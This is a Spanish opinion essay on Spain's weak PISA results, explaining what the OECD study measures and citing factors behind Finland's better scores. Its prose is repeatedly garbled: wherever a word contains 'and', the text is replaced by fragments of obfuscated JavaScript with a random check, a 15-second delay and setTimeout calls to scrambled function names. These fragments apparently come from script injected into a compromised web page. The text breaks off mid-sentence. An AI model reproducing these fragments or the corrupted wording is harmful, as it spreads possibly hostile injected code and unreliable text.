PISA: FIEL REFLEJO DE NUESTRA DECADENCIA EDUCATIVA

Autora: Nuria González Hernández

“¿Deberíamos preocuparnos más por la educación de nuestros hijos?”

Esta pregunta debería estar en boca de muchos españoles que, ahora en tiempos de crisis y sin tiempos de crisis, lo único que tienen para mejorar su futuro es la educación que reciban. No importa si esa educación es privada o pública. Lo que verdaderamente importa es que tenga motivación por aprender, y que esa motivación no sólo se inculque en el colegio o en el instituto, sino que también venga dada desde casa.

Mucho se ha hablado sobre el informe PISA, y muchos han sido los expertos que han tratado este asunto. Sin embargo, parece que por mucho que se hable, y se trate de corregir los malos resultados de España en dicho informe, todo cae en saco roto ya que nuestro país sigue estandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando a la cola en materia educativa. Eso sí, podría ser peor, ya que el principal objetivo de los últimos tiempos ha sido erradicar el analfabetismo que hace 30 años ocupaba gran parte de la sociedad española.

Antes que nada, conviene aclarar qué esto del informe PISA, para qué sirve y todo lo que conlleva para así entender mejor el objetivo de este ensayo.

El informe PISA (por sus siglas en inglés, Programme for International Student Assessment) es, según el estudio del mismo nombre de 2009, “un programa para la evaluación internacional de los alumnos, de la Organización para la Cooperación y el Desarrollo Económico (OCDE) que lo puso en marcha en 1997.”[1] Dicho de otro modo, es un estudio que compara periódica e internacionalmente el rendimiento educativo de alumnos de 15 años por medio de tres competencias (lectora, matemática y científica), habiéndose acordado previamente un marco común para todos los países participantes. En definitiva, se trata de examinar los logros y progresos de los diferentes sistemas educativos y, de esta forma, dar un toque de atención a las Administraciones educativas, profesores, centros escolares y familia cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando sea necesario, para intentar resolver los diferentes problemas.

Este informe “trata de valorar hasta qué punto los alumnos son capaces de usar los conocimientos y destrezas que han aprendido y practicado en la escuela cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando se ven ante situaciones en los que esos conocimientos pueden resultar relevantes.”[2] Es decir, mide cómo el alumnado aplica lo que ha aprendido a lo largo de su vida tanto en la escuela como fuera de ella.

Sin embargo, y tal como he mencionado antes, España sigue estandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando a la cola en cuanto a educación se refiere. Y es que esto del progreso en educación no es algo que se consiga de la noche a la mañana. Pero se han de tener en cuenta varios factores a la hora de saber por qué estamos donde estamos en materia educativa ya que los países que obtienen mejores resultados, como es el caso de Finlandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andia, lo hacen por diversas razones. Entre ellas se pueden citar, “los contextos sociales y económicos en los que la enseñanza tiene lugar, el porcentaje del producto interior bruto que dedican a la educación, el tipo de aprendizaje realizado desde la infancia, la relación profesor-alumno y la experiencia que los estudiantes tienen con el aprendizaje que refleja este tipo de prueba y con la tipología de las pruebas.”[3]

Además de esto, los resultados de los jóvenes en el estudio PISA han de ser analizados considerandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}